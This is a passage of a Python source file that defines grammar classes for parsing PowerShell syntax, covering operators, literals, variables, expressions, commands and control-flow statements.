"notcontains", "notin", "notlike", "notmatch", "replace",
"shl", "shr", "split"
)
grammar = (Dash, OR(*operators))
class FileRedirectionOperator(Grammar):
grammar = OR(
">", ">>", "2>", "2>>", "3>", "3>>", "4>", "4>>",
"5>", "5>>", "6>", "6>>", "*>", "*>>", "<"
)
class MergingRedirectionOperator(Grammar):
grammar = OR(
'*>&1', '2>&1', '3>&1', '4>&1', '5>&1', '6>&1',
'*>&2', '1>&2', '3>&2', '4>&2', '5>&2', '6>&2')
class AssignmentOperator(Grammar):
grammar = OR(
"=", (Dash, "="), "+=", "*=", "/=", "%="
)
class OperatorOrPunctuator(Grammar):
grammar = OR(
"{", "}", "[", "]", "(", ")", "@(", "@{", "$(", ";",
"&&", "||", "&", "|", ",", "++", "..", "::", ".",
"!", "*", "/", "%", "+",
(Dash,
OR(Dash,
*ignore_case_literals(
"and", "band", "bnot", "bor",
"bxor", "not", "or", "xor"
))),
Dash,
AssignmentOperator,
MergingRedirectionOperator,
FileRedirectionOperator,
ComparisonOperator,
FormatOperator,
)
# End of grammar Operators and punctuators
# Grammars for Type Names
class TypeCharacter(Grammar):
grammar = OR(
WORD("A-Za-z", max=1),
WORD("\u005F"),
)
class TypeCharacters(Grammar):
grammar = WORD("A-Za-z\u005F")
class TypeIdentifier(Grammar):
grammar = TypeCharacters
class TypeName(Grammar):
grammar = LIST_OF(TypeIdentifier, sep=".")
class GenericTypeArguments(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(REF('TypeSpec'), sep=(",", OPTIONAL(WHITESPACE)))
class TypeSpec(Grammar):
grammar = (
TypeName,
OPTIONAL(
("[", OR(
GenericTypeArguments,
OPTIONAL(Dimension)
), "]"))
)
class TypeLiteral(Grammar):
grammar = ("[", TypeSpec, "]")
class SimpleNameFirstCharacter(Grammar):
grammar = TypeCharacter
class SimpleNameCharacter(Grammar):
grammar = SimpleNameFirstCharacter
class SimpleNameCharacters(Grammar):
grammar = REPEAT(SimpleNameCharacter)
class SimpleName(Grammar):
grammar = (SimpleNameFirstCharacter, SimpleNameCharacters)
# Grammar for Variables
class BracedVariableCharacter(Grammar):
grammar = OR(
ANY_EXCEPT("\u007D\u0060", max=1),
EscapedCharacter
)
class BracedVariableCharacters(Grammar):
grammar = REPEAT(BracedVariableCharacter)
class VariableCharacters(Grammar):
grammar = WORD("A-Za-z0-9?\u005F")
class VariableNamespace(Grammar):
grammar = (VariableCharacters, ":")
class VariableScope(Grammar):
grammar = OR(
VariableNamespace,
*ignore_case_literals("global:", "local:", "private:", "script:")
)
class BracedVariable(Grammar):
grammar = ("${", OPTIONAL(VariableScope),
BracedVariableCharacters, "}")
class Variable(Grammar):
grammar = OR(
"$$", "$?", "$^",
(OR("$", "@"), OPTIONAL(VariableScope), VariableCharacters),
BracedVariable
)
# End of grammar for variables
# Grammar for Literals
class SingleQuoteCharacter(Grammar):
grammar = OR("\u0027", "\u2018", "\u2019", "\u201A", "\u201B")
class VerbatimHereStringPart(Grammar):
grammar = OR(
EXCEPT(ANY, NewLineCharacter),
(NewLineCharacter, EXCEPT(ANY, SingleQuoteCharacter)),
(NewLineCharacter, SingleQuoteCharacter, ANY_EXCEPT("@", max=1))
)
class VerbatimHereStringCharacters(Grammar):
grammar = REPEAT(VerbatimHereStringPart)
class VerbatimHereStringLiteral(Grammar):
grammar = ("@", SingleQuoteCharacter, OPTIONAL(WHITESPACE),
NewLineCharacter, OPTIONAL(VerbatimHereStringCharacters),
NewLineCharacter, SingleQuoteCharacter, "@")
class VerbatimStringPart(Grammar):
grammar = OR(
EXCEPT(ANY, SingleQuoteCharacter),
(SingleQuoteCharacter, SingleQuoteCharacter)
)
class VerbatimStringCharacters(Grammar):
grammar = REPEAT(VerbatimStringPart)
class VerbatimStringLiteral(Grammar):
grammar = (SingleQuoteCharacter, OPTIONAL(VerbatimStringCharacters),
SingleQuoteCharacter)
class ExpandableStringPart(Grammar):
grammar = OR(
EXCEPT(ANY, OR('$', '\u0060', DoubleQuoteCharacter), max=1),
BracedVariable,
("$", ANY_EXCEPT("({\u0060", max=1) - DoubleQuoteCharacter),
("$", EscapedCharacter),
EscapedCharacter,
(DoubleQuoteCharacter, DoubleQuoteCharacter),
)
class ExpandableHereStringPart(Grammar):
grammar = OR(
ANY_EXCEPT("$", max=1) - NewLineCharacter,
BracedVariable,
("$", ANY_EXCEPT("(", max=1) - NewLineCharacter),
("$", NewLineCharacter, ANY - DoubleQuoteCharacter),
("$", NewLineCharacter, DoubleQuoteCharacter, ANY_EXCEPT("@", max=1)),
(NewLineCharacter, ANY - DoubleQuoteCharacter),
(NewLineCharacter, DoubleQuoteCharacter, ANY_EXCEPT("@", max=1))
)
class ExpandableStringCharacters(Grammar):
grammar = REPEAT(ExpandableStringPart)
class ExpandableStringWithSubexprStart(Grammar):
grammar = (DoubleQuoteCharacter, OPTIONAL(ExpandableStringCharacters),
"$(")
class ExpandableStringWithSubexprEnd(Grammar):
grammar = DoubleQuoteCharacter
class ExpandableStringLiteral(Grammar):
grammar = (DoubleQuoteCharacter, OPTIONAL(ExpandableStringCharacters),
OPTIONAL(Dollars), DoubleQuoteCharacter)
class ExpandableHereStringCharacters(Grammar):
grammar = REPEAT(ExpandableHereStringPart)
class ExpandableHereStringWithSubexprStart(Grammar):
grammar = (
"@", DoubleQuoteCharacter, OPTIONAL(WHITESPACE),
NewLineCharacter, OPTIONAL(ExpandableHereStringCharacters),
"$("
)
class ExpandableHereStringWithSubexprEnd(Grammar):
grammar = (NewLineCharacter, DoubleQuoteCharacter, "@")
class ExpandableHereStringLiteral(Grammar):
grammar = ("@", DoubleQuoteCharacter, OPTIONAL(WHITESPACE),
NewLineCharacter, OPTIONAL(ExpandableHereStringCharacters),
NewLineCharacter, DoubleQuoteCharacter, "@")
class StringLiteral(Grammar):
grammar = OR(ExpandableStringLiteral,
ExpandableHereStringLiteral,
VerbatimStringLiteral,
VerbatimHereStringLiteral)
class DecimalDigits(Grammar):
grammar = WORD('0-9')
class NumericMultiplier(Grammar):
grammar = OR(*ignore_case_literals("kb", "mb", "tb", "pb", "gb"))
class LongTypeSuffix(Grammar):
grammar = OR("l", "L")
class DecimalTypeSuffix(Grammar):
grammar = OR("d", "D", "l", "L")
class NumericTypeSuffix(Grammar):
grammar = OR(DecimalTypeSuffix, LongTypeSuffix)
class Sign(Grammar):
grammar = OR("+", Dash, max=1)
class ExponentPart(Grammar):
grammar = (OR("e", "E"), OPTIONAL(Sign), DecimalDigits)
class HexadecimalDigit(Grammar):
grammar = WORD('0-9a-fA-F', max=1)
class HexadecimalDigits(Grammar):
grammar = OR(REPEAT(HexadecimalDigit),
(HexadecimalDigit, DecimalDigits))
class RealLiteral(Grammar):
grammar = OR(
(DecimalDigits, ".", DecimalDigits, OPTIONAL(ExponentPart),
OPTIONAL(DecimalTypeSuffix), OPTIONAL(NumericMultiplier)),
(".", DecimalDigits, OPTIONAL(ExponentPart),
OPTIONAL(DecimalTypeSuffix), OPTIONAL(NumericMultiplier)),
(DecimalDigits, ExponentPart, OPTIONAL(DecimalTypeSuffix),
OPTIONAL(NumericMultiplier)))
class HexadecimalIntegerLiteral(Grammar):
grammar = ("0x", HexadecimalDigits,
OPTIONAL(LongTypeSuffix),
OPTIONAL(NumericMultiplier))
class DecimalIntegerLiteral(Grammar):
grammar = (DecimalDigits,
OPTIONAL(NumericTypeSuffix),
OPTIONAL(NumericMultiplier))
class IntegerLiteral(Grammar):
grammar = OR(HexadecimalIntegerLiteral, DecimalIntegerLiteral)
class Literal(Grammar):
grammar = OR(RealLiteral, IntegerLiteral, StringLiteral)
# End of grammar for Literals
# Grammar for Commands
class GenericTokenChar(Grammar):
grammar = OR(
EXCEPT(ANY,
OR(
DoubleQuoteCharacter,
SingleQuoteCharacter,
WHITESPACE,
NewLineCharacter,
"{", "}", "(", ")", ";", ",", "|", "&", "$", "\u0060",
)),
EscapedCharacter
)
class GenericTokenPart(Grammar):
grammar = OR(
ExpandableStringLiteral,
VerbatimHereStringLiteral,
Variable,
GenericTokenChar
)
class GenericTokenParts(Grammar):
grammar = REPEAT(GenericTokenPart)
class GenericTokenWithSubexprStart(Grammar):
grammar = (GenericTokenParts, "$(")
class GenericToken(Grammar):
grammar = GenericTokenParts
class FirstParameterCharacter(Grammar):
grammar = OR(
WORD("A-Za-z", max=1),
# The underscore character and question mark
"\u005F", "?"
)
class ParameterCharacter(Grammar):
grammar = EXCEPT(ANY, OR(Colon, WHITESPACE, NewLineCharacter,
"{", "}", "(", ")", ";", ",", "|",
"&", ".", "["))
class ParameterCharacters(Grammar):
grammar = REPEAT(ParameterCharacter)
class CommandParameter(Grammar):
grammar = (Dash, FirstParameterCharacter,
ParameterCharacters, OPTIONAL(Colon))
# End of grammar for Commands
class StatementList(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(REF('Statement'), sep=OPTIONAL(WHITESPACE))
class StatementBlock(Grammar):
grammar_whitespace_mode = "optional"
grammar = ("{", OPTIONAL(StatementList), "}")
class SubExpression(Grammar):
grammar_whitespace_mode = "optional"
grammar = ("$(", OPTIONAL(StatementList), ")")
class BlockName(Grammar):
grammar = OR(
*ignore_case_literals("dynamicparam", "begin", "process", "end")
)
class NamedBlock(Grammar):
grammar = (BlockName, OPTIONAL(WHITESPACE),
StatementBlock,
OPTIONAL(StatementTerminators))
class NamedBlockList(Grammar):
grammar = LIST_OF(NamedBlock, sep=OPTIONAL(WHITESPACE))
class ScriptBlockBody(Grammar):
grammar = OR(NamedBlockList, StatementList)
class ParamBlock(Grammar):
# FIXME: Remove References
grammar_whitespace_mode = "optional"
grammar = (
RE_LITERAL("param"), OPTIONAL(NewLines),
"(", OPTIONAL(REF('ParameterList')), ")"
)
class ScriptBlock(Grammar):
# This grammar can be considered the root grammar.
grammar = (
OPTIONAL(ParamBlock), OPTIONAL(StatementTerminators),
OPTIONAL(ScriptBlockBody)
)
class VerbatimCommandString(Grammar):
grammar = (DoubleQuoteCharacter, NonDoubleQuoteCharacters,
DoubleQuoteCharacter)
class VerbatimCommandArgumentPart(Grammar):
grammar = OR(
VerbatimCommandString,
("&", NonAmpersandCharacter),
EXCEPT(ANY, OR("|", NewLineCharacter))
)
class VerbatimCommandArgumentChars(Grammar):
grammar = REPEAT(VerbatimCommandArgumentPart)
class Keyword(Grammar):
grammar = OR(*ignore_case_literals(
"workflow", "inlinescript", "parallel", "begin", "break", "catch",
"class", "continue", "data", "define", "do", "dynamicparam", "elseif",
"else", "end", "exit", "filter", "finally", "foreach", "for", "from",
"function", "if", "in", "param", "process", "return", "switch", "var",
"throw", "trap", "try", "until", "using", "while"
))
class ExpandableHereStringWithSubexprPart(Grammar):
grammar = OR(SubExpression, ExpandableHereStringPart)
class ExpandableHereStringWithSubexprCharacters(Grammar):
grammar = REPEAT(ExpandableHereStringWithSubexprPart)
class ExpandableHereStringLiteralWithSubexpr(Grammar):
    grammar = (
        ExpandableHereStringWithSubexprStart,
        OPTIONAL(StatementList), ")",
        ExpandableHereStringWithSubexprCharacters,
        ExpandableHereStringWithSubexprEnd
    )
class ExpandableStringWithSubexprPart(Grammar):
grammar = OR(SubExpression, ExpandableStringPart)
class ExpandableStringWithSubexprCharacters(Grammar):
grammar = REPEAT(ExpandableStringWithSubexprPart)
class ExpandableStringLiteralWithSubexpr(Grammar):
grammar = OR(
(
ExpandableStringWithSubexprStart, OPTIONAL(StatementList),
")", ExpandableStringWithSubexprCharacters,
ExpandableStringWithSubexprEnd
),
(
ExpandableHereStringWithSubexprStart, OPTIONAL(StatementList),
")", ExpandableHereStringWithSubexprCharacters,
ExpandableHereStringWithSubexprEnd
)
)
class StringLiteralWithSubexpression(Grammar):
grammar = OR(
ExpandableStringLiteralWithSubexpr,
ExpandableHereStringLiteralWithSubexpr
)
class MemberName(Grammar):
grammar = OR(
# FIXME: Remove references
SimpleName, StringLiteral, StringLiteralWithSubexpression,
REF('ExpressionWithUnaryOperator'), REF('Value')
)
class RangeArgumentExpression(Grammar):
grammar = OR(
# FIXME: Remove references
REF('UnaryExpression'),
(
REF('RangeExpression'), "..", OPTIONAL(NewLines),
REF('UnaryExpression')
)
)
class FormatArgumentExpression(Grammar):
grammar = LIST_OF(RangeArgumentExpression,
sep=(FormatOperator, OPTIONAL(NewLines)))
class MultiplicativeArgumentExpression(Grammar):
grammar = LIST_OF(FormatArgumentExpression,
sep=(OR("*", "/", "%"), OPTIONAL(NewLines)))
class AdditiveArgumentExpression(Grammar):
grammar = LIST_OF(MultiplicativeArgumentExpression,
sep=(OR("+", Dash), OPTIONAL(NewLines)))
class ComparisonArgumentExpression(Grammar):
grammar = LIST_OF(AdditiveArgumentExpression,
sep=(ComparisonOperator, OPTIONAL(NewLines)))
class BitwiseArgumentExpression(Grammar):
grammar = LIST_OF(
ComparisonArgumentExpression,
sep=(
OR(RE_LITERAL("-band"),
RE_LITERAL("-bor"),
RE_LITERAL("-bxor")),
OPTIONAL(NewLines)
)
)
class LogicalArgumentExpression(Grammar):
grammar = LIST_OF(
BitwiseArgumentExpression,
sep=(
OR(RE_LITERAL("-and"),
RE_LITERAL("-or"),
RE_LITERAL("-xor")),
OPTIONAL(NewLines)
)
)
class ArgumentExpressionList(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(LogicalArgumentExpression,
sep=(OPTIONAL(NewLines), ",", OPTIONAL(WHITESPACE)))
class ArgumentList(Grammar):
grammar = ("(", OPTIONAL(ArgumentExpressionList), OPTIONAL(NewLines), ")")
class InvocationExpressionPrime(Grammar):
grammar = (OR(".", "::"), OPTIONAL(WHITESPACE), MemberName,
ArgumentList, OPTIONAL(REF("InvocationExpressionPrime")))
class ElementAccessPrime(Grammar):
# Use this idiom to get rid of left recursion.
grammar = ("[", OPTIONAL(NewLines), REF("Expression"),
OPTIONAL(NewLines), "]",
OPTIONAL(REF("ElementAccessPrime")))
class MemberAccessPrime(Grammar):
# Use this idiom to get rid of left recursion.
grammar = (OR(".", "::"), OPTIONAL(WHITESPACE),
MemberName, OPTIONAL(REF('MemberAccessPrime')))
class PostDecrementExpressionPrime(Grammar):
# Use this idiom to get rid of left recursion.
grammar = (DashDash, OPTIONAL(REF("PostDecrementExpressionPrime")))
class PostIncrementExpressionPrime(Grammar):
# Use this idiom to get rid of left recursion.
grammar = ("++", OPTIONAL(REF("PostIncrementExpressionPrime")))
class KeyExpression(Grammar):
# FIXME: Remove reference
grammar = OR(
SimpleName,
REF('UnaryExpression')
)
class HashEntry(Grammar):
# FIXME: Remove reference
grammar = (KeyExpression,
OPTIONAL(WHITESPACE), "=",
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines),
REF('Statement'))
class HashLiteralBodyPrime(Grammar):
grammar = (StatementTerminators, HashEntry,
OPTIONAL(REF("HashLiteralBodyPrime")))
class HashLiteralBody(Grammar):
grammar = LIST_OF(HashEntry,
sep=(OPTIONAL(WHITESPACE),
OPTIONAL(HashLiteralBodyPrime),
OPTIONAL(WHITESPACE)))
class HashLiteralExpression(Grammar):
grammar = ("@{", OPTIONAL(NewLines),
OPTIONAL(WHITESPACE),
OPTIONAL(HashLiteralBody),
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines), "}")
class ScriptBlockExpression(Grammar):
grammar = ("{", OPTIONAL(NewLines), ScriptBlock,
OPTIONAL(NewLines), "}")
class ArrayExpression(Grammar):
grammar_whitespace_mode = "optional"
grammar = ("@(", OPTIONAL(StatementList), ")")
class ParenthesizedExpression(Grammar):
grammar_whitespace_mode = "optional"
# TODO: remove reference
grammar = ("(", REF('Pipeline'), ")")
class Value(Grammar):
grammar = OR(
ParenthesizedExpression,
SubExpression,
ArrayExpression,
ScriptBlockExpression,
HashLiteralExpression,
Literal,
TypeLiteral,
Variable
)
class PrimaryExpressionPrime(Grammar):
grammar = OR(InvocationExpressionPrime,
MemberAccessPrime,
ElementAccessPrime,
PostIncrementExpressionPrime,
PostDecrementExpressionPrime)
class PrimaryExpression(Grammar):
pe = (OPTIONAL(WHITESPACE), REPEAT(PrimaryExpressionPrime))
grammar = (
Value,
OPTIONAL(OR(REPEAT(pe), REF('PrimaryExpression')))
)
class UnaryExpression(Grammar):
grammar = OR(
PrimaryExpression,
REF('ExpressionWithUnaryOperator'),
)
class CastExpression(Grammar):
grammar = (TypeLiteral, UnaryExpression)
class PreDecrementExpression(Grammar):
grammar = (DashDash, OPTIONAL(NewLines), UnaryExpression)
class PreIncrementExpression(Grammar):
grammar = ("++", OPTIONAL(NewLines), UnaryExpression)
class ExpressionWithUnaryOperator(Grammar):
grammar = OR(
(
OR(",", RE_LITERAL("-bnot"), RE_LITERAL("-not"),
RE_LITERAL("-split"), RE_LITERAL("-join"), "!", "+", Dash),
OPTIONAL(WHITESPACE), UnaryExpression
),
PreIncrementExpression,
PreDecrementExpression,
CastExpression,
)
class ArrayLiteralExpression(Grammar):
grammar = LIST_OF(UnaryExpression,
sep=(OPTIONAL(WHITESPACE), ",", OPTIONAL(WHITESPACE)))
class RangeExpression(Grammar):
grammar = LIST_OF(ArrayLiteralExpression,
sep=("..", OPTIONAL(NewLines)))
class FormatExpression(Grammar):
grammar = LIST_OF(RangeExpression,
sep=(OPTIONAL(WHITESPACE),
FormatOperator,
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines)))
class MultiplicativeExpression(Grammar):
grammar = LIST_OF(FormatExpression,
sep=((OPTIONAL(WHITESPACE),
OR("*", "/", "%"),
OPTIONAL(WHITESPACE)),
OPTIONAL(NewLines)))
class AdditiveExpression(Grammar):
grammar = LIST_OF(MultiplicativeExpression,
sep=(OPTIONAL(WHITESPACE),
OR("+", Dash),
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines)))
class ComparisonExpression(Grammar):
grammar = LIST_OF(AdditiveExpression,
sep=(OPTIONAL(WHITESPACE),
ComparisonOperator,
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines)))
class BitwiseExpression(Grammar):
grammar = LIST_OF(ComparisonExpression,
sep=(OPTIONAL(WHITESPACE),
OR(RE_LITERAL("-band"),
RE_LITERAL("-bor"),
RE_LITERAL("-bxor")),
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines)))
class LogicalExpression(Grammar):
grammar = LIST_OF(BitwiseExpression,
sep=(OPTIONAL(WHITESPACE),
OR(RE_LITERAL("-and"),
RE_LITERAL("-or"),
RE_LITERAL("-xor")),
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines)))
class Expression(Grammar):
grammar = LogicalExpression
# End of grammar for Expressions
# Attributes
class AttributeArgument(Grammar):
grammar = OR(
(OPTIONAL(NewLines), Expression),
(
OPTIONAL(NewLines),
SimpleName,
OPTIONAL(WHITESPACE), "=", OPTIONAL(OPTIONAL(WHITESPACE)),
Expression
)
)
class AttributeArguments(Grammar):
grammar = LIST_OF(AttributeArgument,
sep=(OPTIONAL(WHITESPACE), ",", OPTIONAL(WHITESPACE)))
class AttributeName(Grammar):
grammar = TypeSpec
class Attribute(Grammar):
grammar = OR(
("[", AttributeName, "(", AttributeArguments, OPTIONAL(NewLines),
")", OPTIONAL(NewLines), "]"),
TypeLiteral
)
class AttributeList(Grammar):
grammar = LIST_OF(Attribute, sep=OPTIONAL(WHITESPACE))
class ScriptParameterDefault(Grammar):
grammar = (OPTIONAL(WHITESPACE), "=", OPTIONAL(WHITESPACE), Expression)
class ScriptParameter(Grammar):
grammar = (
OPTIONAL(NewLines),
OPTIONAL(AttributeList), OPTIONAL(WHITESPACE),
Variable, OPTIONAL(ScriptParameterDefault)
)
class ParameterListPrime(Grammar):
grammar_whitespace_mode = "optional"
grammar = (",", ScriptParameter, OPTIONAL(REF('ParameterListPrime')))
class ParameterList(Grammar):
grammar = (ScriptParameter, OPTIONAL(ParameterListPrime))
class CommandName(Grammar):
grammar = OR(GenericToken, GenericTokenWithSubexprStart)
class CommandNameExpr(Grammar):
grammar = OR(CommandName, PrimaryExpression)
class CommandArgument(Grammar):
grammar = CommandNameExpr
class RedirectedFileName(Grammar):
grammar = OR(CommandArgument, PrimaryExpression)
class Redirection(Grammar):
grammar = OR(
MergingRedirectionOperator,
(FileRedirectionOperator, OPTIONAL(WHITESPACE), RedirectedFileName)
)
class CommandElement(Grammar):
grammar = OR(CommandParameter, CommandArgument, Redirection)
class CommandElements(Grammar):
grammar = LIST_OF(CommandElement, sep=OPTIONAL(WHITESPACE))
class CommandModule(Grammar):
grammar = PrimaryExpression
class CommandInvocationOperator(Grammar):
grammar = OR("&", ".")
class Command(Grammar):
grammar = OR(
(CommandName, OPTIONAL(WHITESPACE), OPTIONAL(CommandElements)),
(
CommandInvocationOperator,
OPTIONAL(WHITESPACE),
OPTIONAL(CommandModule),
OPTIONAL(WHITESPACE),
CommandNameExpr,
OPTIONAL(WHITESPACE),
OPTIONAL(CommandElements)
)
)
class PipelineTail(Grammar):
grammar = (
OPTIONAL(WHITESPACE), "|", OPTIONAL(WHITESPACE),
Command, OPTIONAL(REF('PipelineTail'))
)
class AssignmentExpression(Grammar):
# TODO: remove reference
grammar = (Expression, OPTIONAL(WHITESPACE),
AssignmentOperator, OPTIONAL(WHITESPACE),
REF('Statement'))
class Pipeline(Grammar):
grammar = OR(
(Expression, OPTIONAL(Redirection), OPTIONAL(PipelineTail)),
(Command, OPTIONAL(PipelineTail)),
AssignmentExpression,
)
class InlinescriptStatement(Grammar):
grammar = (RE_LITERAL("inlinescript"),
OPTIONAL(WHITESPACE),
StatementBlock)
class ParallelStatement(Grammar):
grammar = (RE_LITERAL("parallel"),
OPTIONAL(WHITESPACE),
StatementBlock)
class SequenceStatement(Grammar):
grammar = (RE_LITERAL("sequence"),
OPTIONAL(WHITESPACE),
StatementBlock)
class DataCommand(Grammar):
grammar = CommandNameExpr
class DataCommandsList(Grammar):
grammar = LIST_OF(
DataCommand,
sep=(OPTIONAL(WHITESPACE), ",", OPTIONAL(WHITESPACE))
)
class DataCommandsAllowed(Grammar):
grammar = (RE_LITERAL("-supportedcommand"),
OPTIONAL(WHITESPACE),
DataCommandsList)
class DataStatement(Grammar):
grammar = (
RE_LITERAL("data"),
OPTIONAL(WHITESPACE),
OPTIONAL(DataCommandsAllowed),
OPTIONAL(WHITESPACE), StatementBlock
)
class ElseIfClause(Grammar):
grammar = (
OPTIONAL(WHITESPACE),
RE_LITERAL("elseif"),
OPTIONAL(WHITESPACE),
"(", OPTIONAL(WHITESPACE), Pipeline, OPTIONAL(WHITESPACE), ")",
OPTIONAL(WHITESPACE),
StatementBlock
)
class ElseIfClauses(Grammar):
grammar = LIST_OF(ElseIfClause, sep=OPTIONAL(WHITESPACE))
class ElseClause(Grammar):
grammar = (
OPTIONAL(WHITESPACE),
RE_LITERAL("else"),
OPTIONAL(WHITESPACE),
StatementBlock
)
class IfStatement(Grammar):
grammar = (
RE_LITERAL("if"),
OPTIONAL(WHITESPACE),
"(", OPTIONAL(WHITESPACE), Pipeline, OPTIONAL(WHITESPACE), ")",
OPTIONAL(WHITESPACE),
StatementBlock, OPTIONAL(ElseIfClauses),
OPTIONAL(ElseClause)
)
class LabelExpression(Grammar):
grammar = OR(SimpleName, UnaryExpression)
class FinallyClause(Grammar):
grammar = (
OPTIONAL(NewLines),
RE_LITERAL("finally"),
OPTIONAL(WHITESPACE), StatementBlock
)
class CatchTypeList(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(TypeLiteral, sep=(","), whitespace_mode="optional")
class CatchClause(Grammar):
grammar_whitespace_mode = "optional"
grammar = (
OPTIONAL(NewLines),
RE_LITERAL("catch"),
OPTIONAL(CatchTypeList),
StatementBlock
)
class CatchClauses(Grammar):
grammar_whitespace_mode = "optional"
grammar = REPEAT(CatchClause)
class TryStatement(Grammar):
grammar_whitespace_mode = "optional"
grammar = (
RE_LITERAL("try"), StatementBlock,
OR(
(CatchClauses, FinallyClause),
CatchClauses,
FinallyClause
)
)
class TrapStatement(Grammar):
grammar = (
RE_LITERAL("trap"), OPTIONAL(WHITESPACE), OPTIONAL(TypeLiteral),
OPTIONAL(WHITESPACE), StatementBlock
)
class FlowControlStatement(Grammar):
grammar = OR(
(
OR(RE_LITERAL("break"), RE_LITERAL("continue")),
OPTIONAL((WHITESPACE, LabelExpression))
),
(
OR(RE_LITERAL("throw"), RE_LITERAL("return"), RE_LITERAL("exit")),
OPTIONAL((WHITESPACE, Pipeline))
),
)
class FunctionParameterDeclaration(Grammar):
grammar = (
"(", OPTIONAL(WHITESPACE),
ParameterList, OPTIONAL(WHITESPACE), ")"
)
class FunctionName(Grammar):
grammar = CommandArgument
class FunctionStatement(Grammar):
grammar = (
OR(
RE_LITERAL("function"),
RE_LITERAL("filter"),
RE_LITERAL("workflow")
),
OPTIONAL(WHITESPACE), FunctionName, OPTIONAL(WHITESPACE),
OPTIONAL(FunctionParameterDeclaration), OPTIONAL(WHITESPACE),
"{", OPTIONAL(WHITESPACE), ScriptBlock, OPTIONAL(WHITESPACE), "}"
)
class WhileCondition(Grammar):
grammar = (OPTIONAL(NewLines), Pipeline)
class DoStatement(Grammar):
grammar = (
RE_LITERAL("do"),
OPTIONAL(WHITESPACE), StatementBlock, OPTIONAL(WHITESPACE),
OR(RE_LITERAL("while"), RE_LITERAL("until")),
OPTIONAL(WHITESPACE), "(", WhileCondition, OPTIONAL(WHITESPACE), ")"
)
class WhileStatement(Grammar):
grammar = (
RE_LITERAL("while"), OPTIONAL(WHITESPACE),
"(", OPTIONAL(WHITESPACE), WhileCondition,
OPTIONAL(WHITESPACE), ")", OPTIONAL(WHITESPACE),
StatementBlock
)
class ForInitializer(Grammar):
grammar = Pipeline
class ForCondition(Grammar):
grammar = Pipeline
class ForIterator(Grammar):
grammar = Pipeline
class ForStatement(Grammar):
grammar = OR(
(
RE_LITERAL("for"), OPTIONAL(WHITESPACE), "(",
OPTIONAL(WHITESPACE),
OPTIONAL(ForInitializer), StatementTerminator,
OPTIONAL(WHITESPACE),
OPTIONAL(ForCondition), StatementTerminator,
OPTIONAL(WHITESPACE),
OPTIONAL(ForIterator), OPTIONAL(WHITESPACE), ")",
OPTIONAL(WHITESPACE), StatementBlock
),
(
RE_LITERAL("for"), OPTIONAL(WHITESPACE), "(",
OPTIONAL(WHITESPACE),
OPTIONAL(ForInitializer), StatementTerminator,
OPTIONAL(WHITESPACE),
OPTIONAL(ForCondition), OPTIONAL(WHITESPACE), ")",
OPTIONAL(WHITESPACE), StatementBlock
),
(
RE_LITERAL("for"), OPTIONAL(WHITESPACE),
"(", OPTIONAL(WHITESPACE),
OPTIONAL(ForInitializer), OPTIONAL(WHITESPACE), ")",
OPTIONAL(WHITESPACE), StatementBlock
),
)
class ForeachParameter(Grammar):
grammar = RE_LITERAL("-parallel")
class ForeachStatement(Grammar):
grammar = (
RE_LITERAL("foreach"),
OPTIONAL(WHITESPACE),
OPTIONAL(ForeachParameter),
OPTIONAL(WHITESPACE),
"(", OPTIONAL(WHITESPACE), Variable, OPTIONAL(WHITESPACE),
RE_LITERAL("in"), OPTIONAL(WHITESPACE), Pipeline,
OPTIONAL(WHITESPACE), ")", OPTIONAL(WHITESPACE),
StatementBlock
)
class SwitchClauseCondition(Grammar):
grammar = OR(CommandArgument, PrimaryExpression)
class SwitchClause(Grammar):
grammar = (SwitchClauseCondition, OPTIONAL(WHITESPACE), StatementBlock,
OPTIONAL(StatementTerminators))
class SwitchClauses(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(SwitchClause, sep=OPTIONAL(WHITESPACE))
class SwitchBody(Grammar):
grammar = (
OPTIONAL(NewLines), "{", OPTIONAL(NewLines),
OPTIONAL(WHITESPACE), SwitchClauses, OPTIONAL(WHITESPACE), "}"
)
class SwitchFilename(Grammar):
grammar = OR(CommandArgument, PrimaryExpression)
class SwitchCondition(Grammar):
grammar = OR(
("(", OPTIONAL(NewLines), Pipeline, OPTIONAL(NewLines), ")"),
("-file", OPTIONAL(WHITESPACE), SwitchFilename)
)
class SwitchParameter(Grammar):
grammar = OR(*ignore_case_literals(
"-regex", "-rege", "-reg", "-re", "-r", "-wildcard", "-wildcar",
"-wildca", "-wildc", "-wild", "-wil", "-wi", "-w", "-exact",
"-exac", "-exa", "-ex", "-e", "-casesensitive", "-casesensitiv",
"-casesensiti", "-casesensit", "-casesensi", "-casesens",
"-casesen", "-casese", "-cases", "-case", "-cas", "-ca", "-c"
))
class SwitchParameters(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(SwitchParameter, sep=OPTIONAL(WHITESPACE))
class SwitchStatement(Grammar):
grammar = (
RE_LITERAL("switch"), OPTIONAL(NewLines), OPTIONAL(WHITESPACE),
OPTIONAL(SwitchParameters), OPTIONAL(WHITESPACE),
SwitchCondition, OPTIONAL(WHITESPACE), SwitchBody
)
class LabeledStatement(Grammar):
grammar = (
OPTIONAL((":", SimpleName, OPTIONAL(WHITESPACE))),
OR(
SwitchStatement,
ForeachStatement,
ForStatement,
WhileStatement,
DoStatement
)
)
class Statement(Grammar):
grammar = OR(
IfStatement,
LabeledStatement,
FunctionStatement,
(FlowControlStatement, StatementTerminator),
TrapStatement,
TryStatement,
DataStatement,
InlinescriptStatement,
ParallelStatement,
SequenceStatement,
(Pipeline, OPTIONAL(StatementTerminator))
)
class InputCharacter(Grammar):
grammar = EXCEPT(ANY, NewLineCharacter, max=1)
class InputCharacters(Grammar):
grammar = REPEAT(InputCharacter)
class Hashes(Grammar):
grammar = REPEAT("#")
class NotGreaterThanOrHash(Grammar):
grammar = ANY_EXCEPT("#>", max=1)
class DelimitedCommentSection(Grammar):
grammar = OR(">", (OPTIONAL(Hashes), NotGreaterThanOrHash))
class DelimitedCommentText(Grammar):
grammar = REPEAT(DelimitedCommentSection)
class DelimitedComment(Grammar):
